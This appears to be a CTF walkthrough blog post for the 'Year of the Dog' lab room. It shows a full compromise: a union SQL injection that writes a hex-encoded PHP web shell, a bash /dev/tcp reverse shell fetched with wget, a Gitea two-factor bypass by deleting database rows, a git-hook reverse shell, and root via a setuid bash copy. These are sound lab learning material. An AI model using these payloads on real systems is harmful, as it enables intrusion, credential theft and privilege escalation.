In this post, we will learn on Year of the Dog room which it exposes to the SQL Injection attack and Remote Code Execution (RCE). The room difficulty rated as HARD and I have the completed it after 3 whole days of struggle with advice from my security friends.
Let’s Start!
As usual, we need to deploy the machine so we can play with the machine.
Once the deploy machine is running, we will have to run nmap command such as nmap -sC -sV <IP Address> -PN to enumerate on the server
From the nmap output, we have found out that the following port are open
- 22: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
- 80: Apache httpd 2.4.29 – Canis Quenue
Firstly, we need to open the website to see the website interface in case anything can be used for exploitation.
However, we still need to bear in mind that SSH port is open
Oh No! There’s nothing that we can work with the website. Let’s run dirb to enumerate any directory install on the website
Sadly, we dont have any directory that we can exploit with.
I try to inspect the website using web inspector and just run any normal attack. Once I have run the website with SQL code, I did notice that the website have an error when I play the website by adding ” ‘ ” at the end of the value of the website
I have done my research on SQL Injection and i found that there are three type of SQL Injection
- Error SQL injection
- Blind SQL Injection
- Union SQL Injection ( which we will be using in these challenges)
Basic Union SQL Injection
‘ UNION SELECT NULL,NULL,NULL–
However, we will focus on more complicated union SQL Injection which some of the code that we can use is been listed below:
'union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') INTO OUTFILE '/var/www/html/shell1.php' from webapp.queue-- -' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED by 0x3c3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E#In my case, i will be using the second union SQL Injection into the place.
When you save the cookie and refresh, the website have shown that “You are number Error in the queue. We don’t have to worry about it and do to the directory shell.php by access http://<IP Address>/shell.php and you will the interface as below:
Just in case, the method above is not suitable for you, there is a another way to access the website by the shell by using burpsuite such as follows:
The result can be seen as the screenshot shown below
As you can see, we get the same output by using either way. So, Don’t worry too much if the first method is not working.
Let’s continue with the challenges!
Before we can upload the shell, the player will obtain a basic knowledge of command such as http://<IP Address>/shell.php?cmd= <any command>
I will use http://<IP Address>/shell.php?cmd=ls as an example for your reference.
For us to successfully upload a reverse shell on the machine, the player will have to run cmd command on the machine. As starter, we need to create a file which you need to fill up the following code into the file
bash -i >& /dev/tcp/<IP Address>/<PORT> 0>&1
We need to transfer the file into the website, you have to start the http.server on the folder which contains the file you want to transfer like below
Once that has done, you can finally transfer the file to the website by using the command
<IP Address>/shell.php?cmd=wget <IP Address>:<PORT>/<Filename that you transfer>
If you want to verify if the file has been successfully uploaded, you can running the command http://<IP Address>/shell.php?cmd=ls
The file have uploaded on the machine successfully.
We need to get the shell connection back by running the command such as <IP Address>/shell.php?cmd=bash <filename>.sh
We know that we are in www-data after the player run the command whoami on the machine’s terminal
It looks easy for now. So, let us peek inside the user of this machine
From the result we retrieve, I can conclude that dylan is the only user that been stored in the machine
Oh wow! We have found the user.txt and let’s get the user flag
Sadly, we cannot access the file because an error have appear that state that permission is denied
But wait! There’s a file named work_analysis that might give a clue on how to access the user.txt file. There are a few command that we can used here.
- cat work_analysis | grep dylan
- grep -Ri dylan 2>/dev/null
Now, we have the username and password for the user “dylan”. Let’s try to ssh into the machine via dylan username and password.
Finally, we have successfully login the machine via dylan’s credential.
We have retrieve user flag successfully without any error appear.
We notice that the localhost is open to the port 3000. So, let’s exit the machine and open new connection by running the command
ssh dylan@<IP Address> -L 3000:localhost:3000
Let access the website on the browser to see if we successfully connected
My bad! We need to access the website the same url as we configured it
We will need to key the username and password as
- username: dylan or dylan@yearofthedog.thm
- password: <use the dylan’s ssh password>
Once you key-in the username and password, a page that required insert Two-Factor Authentication which we didn’t have the passcode at all.
However, we can bypass the TWO-Factor Authentication by delete the passcode from the database.
Let’s go!
We will to access the directory by going to gitea directory by typing cd /gitea/gitea
Let’s delete the two-factor on the database by running the following python script
Now that we have successfully deleted the two_factor on the machine’s database and we can access the dashboard without entering any two-factor authentication.
For the player to receive the connection back for the shell, we need to execute the command and the code that can be found on the pentestmonkey.net
Once we get the code on the pentestmokey website, let’s add those code into the githooks and click update hook
We need to start the listening before proceed on the shell
Next, we will need to download the file as follow by running git clone http://localhost:3000/Dylan/Test-repo.git
* Reminder: Better don’t change the repo on the website, it might not work as plan
Now, We have successfully download the files and run the following command to push the change to git
Once that is done, let’s execute git push origin master command
It’s weird to get error when execute the command as above
I just notice that I have download the repo in my own machine. No wonder it doesn’t work at all!
Let run the same command on target’s machine
We will running the last command which git push origin master and let’s hope it works!
No error appear when the command. Let’s see the listener if we retrieve back the connection on the shell
Wuhuu! We got the connection back. When we access /data directory, we notice that only 3 directories can be found here.
We need the bash file to execute in order for us to root the machine. Let’s upload the bash file into the bash-5.0. On the ssh session, we need to locate the bash file which is normally been stored at /bin/
We will need to run the http.server session on the /bin/ directory for the other machine to gain the bash file.
On the victim’s machine, we need to execute the command
wget <IP Address>:8000/bash -O /data
We can run ls to ensure the file is successfully downloaded.
On the ssh session, we need to verify if the bash file is there
Let’s run bash -p
Nothing happens because the file permission is not been set to the correct permission. In order for the file can be execute, we need to victim’s terminal and run chmod 4755 bash such as shown below:
We can verify the permission changed by typing ls on the ssh session machine
From the screenshot shown above, we can confirm the file’s permission have changed.
Now, we can execute the command bash -p back and hope it works!
We have login successfully as root privileges access and let go and get the root flag. Normally, the flag will be located at /root/
we can ls to check if my assumption is correct
To read the root flag, we can execute the command cat root.txt
-THE END-
Happy Learning Guys!
No responses yet